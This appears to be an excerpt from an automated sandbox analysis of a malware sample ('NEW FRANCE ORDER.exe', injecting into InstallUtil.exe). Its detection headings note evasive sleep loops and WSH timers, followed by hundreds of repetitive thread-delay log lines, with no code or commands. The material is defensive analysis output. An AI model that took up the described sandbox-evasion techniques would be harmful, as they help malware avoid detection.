Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594016 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593797 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593687 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593578 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2349 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7486 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3350 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 6491 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe TID: 7856 Thread sleep count: 200 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -33204139332677172s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7412 Thread sleep count: 2349 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7412 Thread sleep count: 7486 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -599438s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -599218s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -599000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -598891s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -598766s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -598656s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -598546s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -598438s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -598313s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -598188s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -598078s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -597965s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -597852s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -597749s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -597580s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -597453s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -597317s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -597188s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -597063s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -596938s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -596813s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -596688s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -596578s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -596469s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -596344s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -596226s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -596125s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -596016s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -595906s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -595797s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -595687s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -595575s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -595469s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -595344s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -595234s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -595125s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -594658s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -594422s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -594297s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -594188s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -594078s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -593968s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -593859s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2148 Thread sleep time: -593750s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe TID: 1320 Thread sleep count: 189 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -35048813740048126s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3324 Thread sleep count: 3350 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3324 Thread sleep count: 6491 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -599653s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -599527s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -599156s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -599031s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -598920s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -598813s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -598703s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -598594s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -598484s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -598375s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -598266s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -598156s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -598047s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -597937s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -597828s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -597719s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -597594s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -597484s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -597375s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -597265s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -597156s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -597047s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -596937s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -596821s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -596719s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -596574s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -596088s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -595953s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -595818s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -595688s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -595578s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -595469s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -595344s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -595234s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -595125s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -595016s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -594906s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -594797s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -594687s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -594578s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -594469s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -594344s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -594234s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -594125s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -594016s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -593906s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -593797s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -593687s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3216 Thread sleep time: -593578s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598891 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598546 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598438 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598313 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598188 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598078 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597965 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597852 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597749 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597580 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597317 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597188 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597063 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596688 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596226 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596016 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595797 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595687 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595575 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594658 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594422 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594188 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594078 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593968 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593859 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593750 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599653 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599527 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599156 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599031 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598920 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598484 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598266 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598156 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598047 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597937 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597719 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597265 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596821 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596719 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596574 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596088 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595818 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595688 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595016 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594797 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594687 Jump to behavior
